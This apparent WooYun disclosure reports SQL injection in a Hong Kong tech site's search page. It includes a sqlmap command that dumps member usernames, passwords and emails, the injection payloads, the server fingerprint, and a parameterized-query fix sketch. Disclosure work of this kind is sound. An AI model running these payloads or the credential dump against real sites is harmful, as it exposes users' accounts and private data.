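2015-11-25: Details reported to the vendor; awaiting vendor handling.
2015-11-30: The vendor has actively ignored the vulnerability; details disclosed to the public.
ezone.hk (e-zone.com.hk) has a brand-new look, offering one-stop technology news, publishing the latest and hottest technology information and providing comprehensive digital intelligence. Its "News" section focuses on technology, computer, digital and trend news. The "Forum" section is a sharing platform where users discuss hot technology topics, chat casually and show contemporary lifestyle attitudes; the "Q&A" section lets users exchange technology knowledge across four categories including PC and DIGI, and now holds nearly 20,000 items of technology knowledge; the "Events" section co-organizes or assists with various events and seminars together with a number of organizations and media, and provides the industry's latest event information.
URL: http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag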
$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag" -p keyword --technique=BEU --random-agent --batch -D ez_discuz -T cdb_members -C username,password,email,credits,showemail,lastip --dump --start 1 --stop 10
| cdb_members | 124189 |
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-1516') OR 5718=5718#&op=tag

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'ezuser@**.**.**.**'
current user is DBA: False
database management system users [1]:
[*] 'ezuser'@'**.**.**.**'
Add filtering.
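For the `keyword` parameter, the durable form of that filtering is to bind the value as a query parameter instead of concatenating it. The sketch below is an added example, not code from the site or the report: the table, the `IN ('...')` query shape (inferred from the `')` prefix of the reported payloads), the length limit and the function names are assumptions. It uses SQLite so it runs offline, with the boolean payload's MySQL `#` comment swapped for `--`.

```python
import sqlite3

# Boolean-based payload from the report, with MySQL's '#' comment replaced by
# '--' because this sketch runs on SQLite.
PAYLOAD = "-1516') OR 5718=5718 --"

def make_db():
    """Constructed sample data; the real schema behind search.php is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, tag TEXT)")
    db.executemany(
        "INSERT INTO articles (title, tag) VALUES (?, ?)",
        [("Phone review", "智能手機"), ("Laptop review", "電腦"), ("Camera test", "數碼")],
    )
    return db

def search_vulnerable(db, keyword):
    """'Before': keyword is concatenated into a ('...') context (assumed shape)."""
    sql = "SELECT title FROM articles WHERE tag IN ('" + keyword + "')"
    return [row[0] for row in db.execute(sql)]

def search_parameterized(db, keyword):
    """'After': keyword is bound as data, so quotes and comments stay literal."""
    if len(keyword) > 64:  # assumed sanity limit, defence in depth only
        raise ValueError("keyword too long")
    sql = "SELECT title FROM articles WHERE tag IN (?)"
    return [row[0] for row in db.execute(sql, (keyword,))]

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__, "legit  ->", fn(db, "智能手機"))
        print(fn.__name__, "payload->", fn(db, PAYLOAD))
```

With the concatenated query the payload turns the WHERE clause into a tautology and every row comes back; with the bound parameter the same string is only compared against `tag` and matches nothing.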
Severity: no impact (ignored by vendor)
Ignored at: 2015-11-30 10:08
Vulnerability Rank: 15 (WooYun rating)
None yet